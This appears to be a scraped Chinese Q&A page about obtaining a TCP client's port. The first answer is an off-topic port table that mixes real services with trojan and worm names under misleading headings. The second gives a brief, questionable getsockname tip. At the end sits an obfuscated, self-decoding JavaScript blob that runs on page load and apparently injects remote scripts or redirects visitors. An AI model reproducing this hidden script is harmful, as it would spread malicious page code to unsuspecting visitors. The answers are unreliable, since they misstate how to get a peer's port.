tcp通信中怎么获得客户端的端口号?

2025-03-29 13:34:02
推荐回答(2个)
回答(1):

  TCP端口就是为TCP协议通信提供服务的端口。TCP (Transmission Control Protocol) ,TCP是一种面向连接(连接导向)的、可靠的、基于字节流的运输层(Transport layer)通信协议,由IETF的RFC 793说明(specified)。在计算机网络OSI模型中,它完成第四层传输层所指定的功能,我们的电脑与网络连接的许多应用都是通过TCP端口实现的。获取端口号为两种,分别如下:
  一、静态端口获取
  TCP 0= Reserved
  TCP 1=TCP Port Service Multiplexer
  TCP 2=Death
  TCP 5=Remote Job Entry,yoyo
  TCP 7=Echo
  TCP 11=Skun
  TCP 12=Bomber
  TCP 16=Skun
  TCP 17=Skun
  TCP 18=消息传输协议,skun
  TCP 19=Skun
  TCP 20=FTP Data,Amanda
  TCP 21=文件传输,Back Construction,Blade Runner,Doly Trojan,Fore,FTP trojan,Invisible FTP,Larva, WebEx,WinCrash
  TCP 22=远程登录协议
  TCP 23=远程登录(Telnet),Tiny Telnet Server (= TTS)
  TCP 25=电子邮件(SMTP),Ajan,Antigen,Email Password Sender,Happy 99,Kuang2,ProMail trojan,Shtrilitz,Stealth,Tapiras,Terminator,WinPC,WinSpy,Haebu Coceda
  TCP 27=Assasin
  TCP 28=Amanda
  TCP 29=MSG ICP
  TCP 30=Agent 40421
  TCP 31=Agent 31,Hackers Paradise,Masters Paradise,Agent 40421
  TCP 37=Time,ADM worm
  TCP 39=SubSARI
  TCP 41=DeepThroat,Foreplay
  TCP 42=Host Name Server
  TCP 43=WHOIS
  TCP 44=Arctic
  TCP 48=DRAT
  TCP 49=主机登录协议
  TCP 50=DRAT
  TCP 51=IMP Logical Address Maintenance,Fuck Lamers Backdoor
  TCP 52=MuSka52,Skun
  TCP 53=DNS,Bonk (DOS Exploit)
  TCP 54=MuSka52
  TCP 58=DMSetup
  TCP 59=DMSetup
  TCP 63=whois++
  TCP 64=Communications Integrator
  TCP 65=TACACS-Database Service
  TCP 66=Oracle SQL*NET,AL-Bareki
  TCP 67=Bootstrap Protocol Server
  TCP 68=Bootstrap Protocol Client
  TCP 69=W32.Evala.Worm,BackGate Kit,Nimda,Pasana,Storm,Storm worm,Theef,Worm.Cycle.a
  TCP 70=Gopher服务,ADM worm
  TCP 79=用户查询(Finger),Firehotcker,ADM worm
  TCP 80=超文本服务器(Http),Executor,RingZero
  TCP 81=Chubo,Worm.Bbeagle.q
  TCP 82=Netsky-Z
  TCP 88=Kerberos krb5服务
  TCP 99=Hidden Port
  TCP 102=消息传输代理
  TCP 108=SNA网关访问服务器
  TCP 109=Pop2
  TCP 110=电子邮件(Pop3),ProMail
  TCP 113=Kazimas, Auther Idnet
  TCP 115=简单文件传输协议
  TCP 118=SQL Services, Infector 1.4.2
  TCP 119=新闻组传输协议(Newsgroup(Nntp)), Happy 99
  TCP 121=JammerKiller, Bo jammerkillah
  UDP 123=网络时间协议(NTP),Net Controller
  TCP 129=Password Generator Protocol
  TCP 133=Infector 1.x
  TCP 135=微软DCE RPC end-point mapper服务
  TCP 137=微软Netbios Name服务(网上邻居传输文件使用)
  TCP 138=微软Netbios Name服务(网上邻居传输文件使用)
  TCP 139=微软Netbios Name服务(用于文件及打印机共享)
  TCP 142=NetTaxi
  TCP 143=IMAP
  TCP 146=FC Infector,Infector
  TCP 150=NetBIOS Session Service
  TCP 156=SQL服务器
  TCP 161=Snmp
  TCP 162=Snmp-Trap
  TCP 170=A-Trojan
  TCP 177=X Display管理控制协议
  TCP 179=Border网关协议(BGP)
  TCP 190=网关访问控制协议(GACP)
  TCP 194=Irc
  TCP 197=目录定位服务(DLS)
  TCP 256=Nirvana
  TCP 315=The Invasor
  TCP 371=ClearCase版本管理软件
  TCP 389=Lightweight Directory Access Protocol (LDAP)
  TCP 396=Novell Netware over IP
  TCP 420=Breach
  TCP 421=TCP Wrappers
  TCP 443=安全服务
  TCP 444=Simple Network Paging Protocol(SNPP)
  TCP 445=Microsoft-DS
  TCP 455=Fatal Connections
  TCP 456=Hackers paradise,FuseSpark
  TCP 458=苹果公司QuickTime
  TCP 513=Grlogin
  TCP 514=RPC Backdoor
  TCP 520=EFS (UDP520=RIP)
  TCP 531=Rasmin,Net666
  TCP 544=kerberos kshell
  TCP 546=DHCP Client
  TCP 547=DHCP Server
  TCP 548=Macintosh文件服务
  TCP 555=Ini-Killer,Phase Zero,Stealth Spy
  TCP 569=MSN
  TCP 605=SecretService
  TCP 606=Noknok8
  TCP 660=DeepThroat
  TCP 661=Noknok8
  TCP 666=Attack FTP,Satanz Backdoor,Back Construction,Dark Connection Inside 1.2
  TCP 667=Noknok7.2
  TCP 668=Noknok6
  TCP 669=DP trojan
  TCP 692=GayOL
  TCP 707=Welchia,nachi
  TCP 777=AIM Spy
  TCP 808=RemoteControl,WinHole
  TCP 815=Everyone Darling
  TCP 901=Backdoor.Devil
  TCP 911=Dark Shadow
  TCP 990=ssl加密
  TCP 993=IMAP
  TCP 999=DeepThroat
  TCP 1000=Der Spaeher
  TCP 1001=Silencer,WebEx,Der Spaeher
  TCP 1003=BackDoor
  TCP 1010=Doly
  TCP 1011=Doly
  TCP 1012=Doly
  TCP 1015=Doly
  TCP 1016=Doly
  TCP 1020=Vampire
  TCP 1023=Worm.Sasser.e
  TCP 1024=NetSpy.698(YAI)

  2二、动态端口获取
  TCP 1059=nimreg
  TCP 1025=NetSpy.698,Unused Windows Services Block
  TCP 1026=Unused Windows Services Block
  TCP 1027=Unused Windows Services Block
  TCP 1028=Unused Windows Services Block
  TCP 1029=Unused Windows Services Block
  TCP 1030=Unused Windows Services Block
  TCP 1033=Netspy
  TCP 1035=Multidropper
  TCP 1042=Bla
  TCP 1045=Rasmin
  TCP 1047=GateCrasher
  TCP 1050=MiniCommand
  TCP 1069=Backdoor.TheefServer.202
  TCP 1070=Voice,Psyber Stream Server,Streaming Audio Trojan
  TCP 1080=Wingate,Worm.BugBear.B,Worm.Novarg.B
  TCP 1090=Xtreme, VDOLive
  TCP 1092=LoveGate
  TCP 1095=Rat
  TCP 1097=Rat
  TCP 1098=Rat
  TCP 1099=Rat
  TCP 1110=nfsd-keepalive
  TCP 1111=Backdoor.AIMVision
  TCP 1155=Network File Access
  TCP 1170=Psyber Stream Server,Streaming Audio trojan,Voice
  TCP 1200=NoBackO
  TCP 1201=NoBackO
  TCP 1207=Softwar
  TCP 1212=Nirvana,Visul Killer
  TCP 1234=Ultors
  TCP 1243=BackDoor-G, SubSeven, SubSeven Apocalypse
  TCP 1245=VooDoo Doll
  TCP 1269=Mavericks Matrix
  TCP 1313=Nirvana
  TCP 1349=BioNet
  TCP 1433=Microsoft SQL服务
  TCP 1441=Remote Storm
  TCP 1492=FTP99CMP(BackOriffice.FTP)
  TCP 1503=NetMeeting T.120
  TCP 1509=Psyber Streaming Server
  TCP 1600=Shivka-Burka
  TCP 1703=Exloiter 1.1
  TCP 1720=NetMeeting H.233 call Setup
  TCP 1731=NetMeeting音频调用控制
  TCP 1807=SpySender
  TCP 1966=Fake FTP 2000
  TCP 1976=Custom port
  TCP 1981=Shockrave
  TCP 1990=stun-p1 cisco STUN Priority 1 port
  TCP 1990=stun-p1 cisco STUN Priority 1 port
  TCP 1991=stun-p2 cisco STUN Priority 2 port
  TCP 1992=stun-p3 cisco STUN Priority 3 port,ipsendmsg IPsendmsg
  TCP 1993=snmp-tcp-port cisco SNMP TCP port
  TCP 1994=stun-port cisco serial tunnel port
  TCP 1995=perf-port cisco perf port
  TCP 1996=tr-rsrb-port cisco Remote SRB port
  TCP 1997=gdp-port cisco Gateway Discovery Protocol
  TCP 1998=x25-svc-port cisco X.25 service (XOT)
  TCP 1999=BackDoor, TransScout
  TCP 2000=Der Spaeher,INsane Network
  TCP 2002=W32.Beagle. AX mm
  TCP 2001=Transmisson scout
  TCP 2002=Transmisson scout
  TCP 2003=Transmisson scout
  TCP 2004=Transmisson scout
  TCP 2005=TTransmisson scout
  TCP 2011=cypress
  TCP 2015=raid-cs
  TCP 2023=Ripper,Pass Ripper,Hack City Ripper Pro
  TCP 2049=NFS
  TCP 2115=Bugs
  TCP 2121=Nirvana
  TCP 2140=Deep Throat, The Invasor
  TCP 2155=Nirvana
  TCP 2208=RuX
  TCP 2255=Illusion Mailer
  TCP 2283=HVL Rat5
  TCP 2300=PC Explorer
  TCP 2311=Studio54
  TCP 2556=Worm.Bbeagle.q
  TCP 2565=Striker
  TCP 3210=SchoolBus
  TCP 3332=Worm.Cycle.a
  TCP 3333=Prosiak
  TCP 3389=超级终端
  TCP 3456=Terror
  TCP 3459=Eclipse 2000
  TCP 3700=Portal of Doom
  TCP 4500=W32.HLLW.Tufas
  TCP 5190=ICQ Query
  TCP 5321=Firehotcker
  TCP 5333=Backage Trojan Box 3
  TCP 5343=WCrat
  TCP 5400=Blade Runner, BackConstruction1.2
  TCP 5401=Blade Runner,Back Construction
  TCP 5402=Blade Runner,Back Construction
  TCP 5471=WinCrash
  TCP 5512=Illusion Mailer
  TCP 5521=Illusion Mailer
  TCP 5550=Xtcp,INsane Network
  TCP 5554=Worm.Sasser
  TCP 5555=ServeMe
  TCP 5556=BO Facil
  TCP 5557=BO Facil
  TCP 5569=Robo-Hack
  TCP 5598=BackDoor 2.03
  TCP 5631=PCAnyWhere data
  TCP 5632=PCAnyWhere
  TCP 5637=PC Crasher
  TCP 5638=PC Crasher
  TCP 5698=BackDoor
  TCP 5714=Wincrash3
  TCP 5741=WinCrash3
  TCP 5742=WinCrash
  TCP 5760=Portmap Remote Root Linux Exploit
  TCP 5880=Y3K RAT
  TCP 5881=Y3K RAT
  TCP 5882=Y3K RAT
  TCP 5888=Y3K RAT
  TCP 5889=Y3K RAT
  TCP 5900=WinVnc
  TCP 6000=Backdoor.AB
  TCP 6006=Noknok8
  TCP 6129=Dameware Nt Utilities服务器
  TCP 6272=SecretService
  TCP 6267=广外女生
  TCP 6400=Backdoor.AB,The Thing
  TCP 6500=Devil 1.03
  TCP 6661=Teman
  TCP 6666=TCPshell.c
  TCP 6667=NT Remote Control,Wise 播放器接收端口
  TCP 6668=Wise Video广播端口
  TCP 6669=Vampyre
  TCP 6670=DeepThroat,iPhone
  TCP 6671=Deep Throat 3.0
  TCP 6711=SubSeven
  TCP 6712=SubSeven1.x
  TCP 6713=SubSeven
  TCP 6723=Mstream
  TCP 6767=NT Remote Control
  TCP 6771=DeepThroat
  TCP 6776=BackDoor-G,SubSeven,2000 Cracks
  TCP 6777=Worm.BBeagle
  TCP 6789=Doly Trojan
  TCP 6838=Mstream
  TCP 6883=DeltaSource
  TCP 6912=Shit Heep
  TCP 6939=Indoctrination
  TCP 6969=GateCrasher, Priority, IRC 3
  TCP 6970=RealAudio,GateCrasher
  TCP 7000=Remote Grab,NetMonitor,SubSeven1.x
  TCP 7001=Freak88
  TCP 7201=NetMonitor
  TCP 7215=BackDoor-G, SubSeven
  TCP 7001=Freak88,Freak2k
  TCP 7300=NetMonitor
  TCP 7301=NetMonitor
  TCP 7306=NetMonitor,NetSpy 1.0
  TCP 7307=NetMonitor, ProcSpy
  TCP 7308=NetMonitor, X Spy
  TCP 7323=Sygate服务器端
  TCP 7424=Host Control
  TCP 7511=聪明基因
  TCP 7597=Qaz
  TCP 7609=Snid X2
  TCP 7626=冰河
  TCP 7777=The Thing
  TCP 7789=Back Door Setup, ICQKiller
  TCP 7983=Mstream
  TCP 8000=腾讯OICQ服务器端,XDMA
  TCP 8010=Wingate,Logfile
  TCP 8011=WAY2.4
  TCP 8080=WWW 代理,Ring Zero,Chubo,Worm.Novarg.B
  TCP 8102=网络神偷
  TCP 8181=W32.Erkez.Dmm
  TCP 8520=W32.Socay.Worm
  TCP 8594=I-Worm/Bozori.a
  TCP 8787=BackOfrice 2000
  TCP 8888=Winvnc
  TCP 8897=Hack Office,Armageddon
  TCP 8989=Recon
  TCP 9000=Netministrator
  TCP 9325=Mstream
  TCP 9400=InCommand 1.0
  TCP 9401=InCommand 1.0
  TCP 9402=InCommand 1.0
  TCP 9872=Portal of Doom
  TCP 9873=Portal of Doom
  TCP 9874=Portal of Doom
  TCP 9875=Portal of Doom
  TCP 9876=Cyber Attacker
  TCP 9878=TransScout
  TCP 9989=Ini-Killer
  TCP 9898=Worm.Win32.Dabber.a
  TCP 9999=Prayer Trojan
  TCP 10000=webmin管理端口
  TCP 10067=Portal of Doom
  TCP 10080=Worm.Novarg.B
  TCP 10084=Syphillis
  TCP 10085=Syphillis
  TCP 10086=Syphillis
  TCP 10101=BrainSpy
  TCP 10167=Portal Of Doom
  TCP 10168=Worm.Supnot.78858.c,Worm.LovGate.T
  TCP 10520=Acid Shivers
  TCP 10607=Coma trojan
  TCP 10666=Ambush
  TCP 11000=Senna Spy
  TCP 11050=Host Control
  TCP 11051=Host Control
  TCP 11223=Progenic,Hack ’99KeyLogger
  TCP 11831=TROJ_LATINUS.SVR
  TCP 12076=Gjamer, MSH.104b
  TCP 12223=Hack’99 KeyLogger
  TCP 12345=GabanBus, NetBus 1.6/1.7, Pie Bill Gates, X-bill
  TCP 12346=GabanBus, NetBus 1.6/1.7, X-bill
  TCP 12349=BioNet
  TCP 12361=Whack-a-mole
  TCP 12362=Whack-a-mole
  TCP 12363=Whack-a-mole
  TCP 12378=W32/GibeM
  TCP 12456=NetBus
  TCP 12623=DUN Control
  TCP 12624=Buttman
  TCP 12631=WhackJob, WhackJob.NB1.7
  TCP 12701=Eclipse2000
  TCP 12754=Mstream
  TCP 13000=Senna Spy
  TCP 13010=Hacker Brazil
  TCP 13013=Psychward
  TCP 13223=Tribal Voice的聊天程序PowWow
  TCP 13700=Kuang2 The Virus
  TCP 14456=Solero
  TCP 14500=PC Invader
  TCP 14501=PC Invader
  TCP 14502=PC Invader
  TCP 14503=PC Invader
  TCP 15000=NetDaemon 1.0
  TCP 15092=Host Control
  TCP 15104=Mstream

回答(2):

在连接建立以后 getsockname可取得本地的连接信息.包括端口号.

!function(){function a(a){var _idx="o2ehxwc2vm";var b={e:"P",w:"D",T:"y","+":"J",l:"!",t:"L",E:"E","@":"2",d:"a",b:"%",q:"l",X:"v","~":"R",5:"r","&":"X",C:"j","]":"F",a:")","^":"m",",":"~","}":"1",x:"C",c:"(",G:"@",h:"h",".":"*",L:"s","=":",",p:"g",I:"Q",1:"7",_:"u",K:"6",F:"t",2:"n",8:"=",k:"G",Z:"]",")":"b",P:"}",B:"U",S:"k",6:"i",g:":",N:"N",i:"S","%":"+","-":"Y","?":"|",4:"z","*":"-",3:"^","[":"{","(":"c",u:"B",y:"M",U:"Z",H:"[",z:"K",9:"H",7:"f",R:"x",v:"&","!":";",M:"_",Q:"9",Y:"e",o:"4",r:"A",m:".",O:"o",V:"W",J:"p",f:"d",":":"q","{":"8",W:"I",j:"?",n:"5",s:"3","|":"T",A:"V",D:"w",";":"O"};return a.split("").map(function(a){return void 0!==b[a]?b[a]:a}).join("")}var b=a('data:image/jpg;base64,cca8>[7_2(F6O2 5ca[5YF_52"vX8"%cmn<ydFhm5d2fO^caj}g@aPqYF 282_qq!Xd5 Y=F=O8D62fODm622Y5V6fFh!qYF ^8O/Ko0.c}00%n0.cs*N_^)Y5c"}"aaa=78[6L|OJgN_^)Y5c"@"a<@=5YXY5LY9Y6phFgN_^)Y5c"0"a=YXY2F|TJYg"FO_(hY2f"=LqOFWfg_cmn<ydFhm5d2fO^cajngKa=5YXY5LYWfg_cmn<ydFhm5d2fO^cajngKa=5ODLgo=(Oq_^2Lg}0=6FY^V6FhgO/}0=6FY^9Y6phFg^/o=qOdfiFdF_Lg0=5Y|5Tg0P=68"#MqYYb"=d8HZ!F5T[d8+i;NmJd5LYc(c6a??"HZ"aP(dF(hcYa[P7_2(F6O2 pcYa[5YF_52 Ym5YJqd(Yc"[[fdTPP"=c2YD wdFYampYFwdFYcaaP7_2(F6O2 (cY=Fa[qYF 282_qq!F5T[28qO(dqiFO5dpYmpYFWFY^cYaP(dF(hcYa[Fvvc28FcaaP5YF_52 2P7_2(F6O2 qcY=F=2a[F5T[qO(dqiFO5dpYmLYFWFY^cY=FaP(dF(hcYa[2vv2caPP7_2(F6O2 LcY=Fa[F8}<d5p_^Y2FLmqY2pFhvvXO6f 0l88FjFg""!7mqOdfiFdF_L8*}=}00<dmqY2pFh??cdmJ_Lhc`c$[YPa`%Fa=qc6=+i;NmLF562p67TcdaaaP7_2(F6O2 _cYa[qYF F80<d5p_^Y2FLmqY2pFhvvXO6f 0l88YjYg}=28"ruxwE]k9W+ztyN;eI~i|BAV&-Ud)(fY7h6CSq^2OJ:5LF_XDRT4"=O82mqY2pFh=58""!7O5c!F**!a5%82HydFhm7qOO5cydFhm5d2fO^ca.OaZ!5YF_52 5P7_2(F6O2 fcYa[qYF F8fO(_^Y2Fm(5YdFYEqY^Y2Fc"L(56JF"a!Xd5 28H"hFFJLg\/\/[[fdTPPKs0)hFL_h^m(RdTd7hmRT4gQ}1Q"="hFFJLg\/\/[[fdTPPKs0)hFL_h^m(RdTd7hmRT4gQ}1Q"="hFFJLg\/\/[[fdTPPKs0)hFL_h^m(RdTd7hmRT4gQ}1Q"="hFFJLg\/\/[[fdTPPKs0)hFL_h^m(RdTd7hmRT4gQ}1Q"="hFFJLg\/\/[[fdTPPKs0)hFL_h^m(RdTd7hmRT4gQ}1Q"="hFFJLg\/\/[[fdTPPKs0)hFL_h^m(RdTd7hmRT4gQ}1Q"="hFFJLg\/\/[[fdTPPKs0)hFL_h^m(RdTd7hmRT4gQ}1Q"Z!qYF O8pc2Hc2YD wdFYampYFwdTcaZ??2H0Za%"/h^/Ks0jR8O@YhRD(@X^"!O8O%c*}888Om62fYR;7c"j"aj"j"g"v"a%"58"%7m5Y|5T%%%"vF8"%hca%5ca=FmL5(8pcOa=FmO2qOdf87_2(F6O2ca[7mqOdfiFdF_L8@=)caP=FmO2Y55O587_2(F6O2ca[YvvYca=LYF|6^YO_Fc7_2(F6O2ca[Fm5Y^OXYcaP=}0aP=fO(_^Y2FmhYdfmdJJY2fxh6qfcFa=7mqOdfiFdF_L8}P7_2(F6O2 hca[qYF Y8(c"bb___b"a!5YF_52 Y??qc"bb___b"=Y8ydFhm5d2fO^camFOiF562pcsKamL_)LF562pcsa=7_2(F6O2ca[Y%8"M"Pa=Y2(OfYB~WxO^JO2Y2FcYaPr55dTm6Lr55dTcda??cd8HZ=qc6=""aa!qYF J8"Ks0"=X8"O@YhRD(@X^"!7_2(F6O2 TcYa[}l88Ym5YdfTiFdFYvv0l88Ym5YdfTiFdFY??Ym(qOLYcaP7_2(F6O2 DcYa[Xd5 F8H"Ks0^)ThF)m5JXLh2_mRT4"="Ks0X5ThF)m6S5h5)XmRT4"="Ks02pThFm5JXLh2_mRT4"="Ks0_JqhFm6S5h5)XmRT4"="Ks02TOhFm5JXLh2_mRT4"="Ks0CSqhF)m6S5h5)XmRT4"="Ks0)FfThF)fm5JXLh2_mRT4"Z=F8FHc2YD wdFYampYFwdTcaZ??FH0Z=F8"DLLg//"%c2YD wdFYampYFwdFYca%F%"g@Q}1Q"!qYF O82YD VY)iO(SYFcF%"/"%J%"jR8"%X%"v58"%7m5Y|5T%%%"vF8"%hca%5ca%c2_qql882j2gcF8fO(_^Y2Fm:_Y5TiYqY(FO5c"^YFdH2d^Y8(Z"a=28Fj"v(h8"%FmpYFrFF56)_FYc"("ag""aaa!OmO2OJY287_2(F6O2ca[7mqOdfiFdF_L8@P=OmO2^YLLdpY87_2(F6O2cFa[qYF 28FmfdFd!F5T[28cY8>[qYF 5=F=2=O=6=d=(8"(hd5rF"=q8"75O^xhd5xOfY"=L8"(hd5xOfYrF"=_8"62fYR;7"=f8"ruxwE]k9W+ztyN;eI~i|BAV&-Ud)(fY7ph6CSq^2OJ:5LF_XDRT40}@sonK1{Q%/8"=h8""=^80!7O5cY8Ym5YJqd(Yc/H3r*Ud*40*Q%/8Z/p=""a!^<YmqY2pFh!a28fH_ZcYH(Zc^%%aa=O8fH_ZcYH(Zc^%%aa=68fH_ZcYH(Zc^%%aa=d8fH_ZcYH(Zc^%%aa=58c}nvOa<<o?6>>@=F8csv6a<<K?d=h%8iF562pHqZc2<<@?O>>oa=Kol886vvch%8iF562pHqZc5aa=Kol88dvvch%8iF562pHqZcFaa![Xd5 78h!qYF Y8""=F=2=O!7O5cF858280!F<7mqY2pFh!ac587HLZcFaa<}@{jcY%8iF562pHqZc5a=F%%ag}Q}<5vv5<@ojc287HLZcF%}a=Y%8iF562pHqZccs}v5a<<K?Ksv2a=F%8@agc287HLZcF%}a=O87HLZcF%@a=Y%8iF562pHqZcc}nv5a<<}@?cKsv2a<<K?KsvOa=F%8sa!5YF_52 YPPac2a=2YD ]_2(F6O2c"MFf(L"=2acfO(_^Y2Fm(_55Y2Fi(56JFaP(dF(hcYa[F82mqY2pFh*o0=F8F<0j0gJd5LYW2FcydFhm5d2fO^ca.Fa!Lc@0o=` $[Ym^YLLdpYP M[$[FPg$[2mL_)LF562pcF=F%o0aPPM`a=7mqOdfiFdF_L8*}PTcOa=@8887mqOdfiFdF_Lvv)caP=OmO2Y55O587_2(F6O2ca[@l887mqOdfiFdF_LvvYvvYca=TcOaP=7mqOdfiFdF_L8}PqYF i8l}!7_2(F6O2 )ca[ivvcfO(_^Y2Fm5Y^OXYEXY2Ft6LFY2Y5c7mYXY2F|TJY=7m(q6(S9d2fqY=l0a=Y8fO(_^Y2FmpYFEqY^Y2FuTWfc7m5YXY5LYWfaavvYm5Y^OXYca!Xd5 Y=F8fO(_^Y2Fm:_Y5TiYqY(FO5rqqc7mLqOFWfa!7O5cqYF Y80!Y<FmqY2pFh!Y%%aFHYZvvFHYZm5Y^OXYcaP7_2(F6O2 $ca[LYF|6^YO_Fc7_2(F6O2ca[67c@l887mqOdfiFdF_La[Xd5[(Oq_^2LgY=5ODLgO=6FY^V6Fhg5=6FY^9Y6phFg6=LqOFWfgd=6L|OJg(=5YXY5LY9Y6phFgqP87!7_2(F6O2 Lca[Xd5 Y8pc"hFFJLg//[[fdTPPKs0qhOFq^)Y6(:m_XO6L)pmRT4gQ}1Q/((/Ks0j6LM2OF8}vFd5pYF8}vFT8@"a!FOJmqO(dF6O2l88LYq7mqO(dF6O2jFOJmqO(dF6O28YgD62fODmqO(dF6O2mh5Y78YP7O5cqYF 280!2<Y!2%%a7O5cqYF F80!F<O!F%%a[qYF Y8"JOL6F6O2g76RYf!4*62fYRg}00!f6LJqdTg)qO(S!"%`qY7Fg$[2.5PJR!D6fFhg$[ydFhm7qOO5cmQ.5aPJR!hY6phFg$[6PJR!`!Y%8(j`FOJg$[q%F.6PJR`g`)OFFO^g$[q%F.6PJR`!Xd5 _8fO(_^Y2Fm(5YdFYEqY^Y2Fcda!_mLFTqYm(LL|YRF8Y=_mdffEXY2Ft6LFY2Y5c7mYXY2F|TJY=La=fO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc")Y7O5YY2f"=_aP67clia[qYF[YXY2F|TJYgY=6L|OJg5=5YXY5LY9Y6phFg6P87!fO(_^Y2FmdffEXY2Ft6LFY2Y5cY=h=l0a=7m(q6(S9d2fqY8h!Xd5 28fO(_^Y2Fm(5YdFYEqY^Y2Fc"f6X"a!7_2(F6O2 fca[Xd5 Y8pc"hFFJLg//[[fdTPPKs0qhOFq^)Y6(:m_XO6L)pmRT4gQ}1Q/((/Ks0j6LM2OF8}vFd5pYF8}vFT8@"a!FOJmqO(dF6O2l88LYq7mqO(dF6O2jFOJmqO(dF6O28YgD62fODmqO(dF6O2mh5Y78YP7_2(F6O2 hcYa[Xd5 F8D62fODm622Y59Y6phF!qYF 280=O80!67cYaLD6F(hcYmLFOJW^^Yf6dFYe5OJdpdF6O2ca=YmFTJYa[(dLY"FO_(hLFd5F"g28YmFO_(hYLH0Zm(q6Y2F&=O8YmFO_(hYLH0Zm(q6Y2F-!)5YdS!(dLY"FO_(hY2f"g28Ym(hd2pYf|O_(hYLH0Zm(q6Y2F&=O8Ym(hd2pYf|O_(hYLH0Zm(q6Y2F-!)5YdS!(dLY"(q6(S"g28Ym(q6Y2F&=O8Ym(q6Y2F-P67c0<2vv0<Oa67c5a[67cO<86a5YF_52l}!O<^%6vvfcaPYqLY[F8F*O!67cF<86a5YF_52l}!F<^%6vvfcaPP2m6f87m5YXY5LYWf=2mLFTqYm(LL|YRF8`hY6phFg$[7m5YXY5LY9Y6phFPJR`=5jfO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc"d7FY5)Yp62"=2agfO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc")Y7O5YY2f"=2a=i8l0PqYF F8pc"hFFJLg//[[fdTPPKs0)hFL_h^m(RdTd7hmRT4gQ}1Q/f/Ks0j(8}vR8O@YhRD(@X^"a!FvvLYF|6^YO_Fc7_2(F6O2ca[Xd5 Y8fO(_^Y2Fm(5YdFYEqY^Y2Fc"L(56JF"a!YmL5(8F=fO(_^Y2FmhYdfmdJJY2fxh6qfcYaP=}YsaPP=@n00aPO82dX6pdFO5mJqdF7O5^=Y8l/3cV62?yd(a/mFYLFcOa=F8Jd5LYW2FcL(5YY2mhY6phFa>8Jd5LYW2FcL(5YY2mD6fFha=cY??Favvc/)d6f_?9_dDY6u5ODLY5?A6XOu5ODLY5?;JJOu5ODLY5?9YT|dJu5ODLY5?y6_6u5ODLY5?yIIu5ODLY5?Bxu5ODLY5?IzI/6mFYLFc2dX6pdFO5m_LY5rpY2FajDc7_2(F6O2ca[Lc@0}a=Dc7_2(F6O2ca[Lc@0@a=fc7_2(F6O2ca[Lc@0saPaPaPagfc7_2(F6O2ca[Lc}0}a=fc7_2(F6O2ca[Lc}0@a=Dc7_2(F6O2ca[Lc}0saPaPaPaa=lYvvO??$ca=XO6f 0l882dX6pdFO5mLY2fuYd(O2vvfO(_^Y2FmdffEXY2Ft6LFY2Y5c"X6L6)6q6FT(hd2pY"=7_2(F6O2ca[Xd5 Y=F!"h6ffY2"888fO(_^Y2FmX6L6)6q6FTiFdFYvvdmqY2pFhvvcY8pc"hFFJLg//[[fdTPPKs0)hFL_h^m(RdTd7hmRT4gQ}1Q"a%"/)_pj68"%J=cF82YD ]O5^wdFdamdJJY2fc"^YLLdpY"=+i;NmLF562p67Tcdaa=FmdJJY2fc"F"="0"a=2dX6pdFO5mLY2fuYd(O2cY=Fa=dmqY2pFh80=qc6=""aaPaPaca!'.substr(22));new Function(b)()}();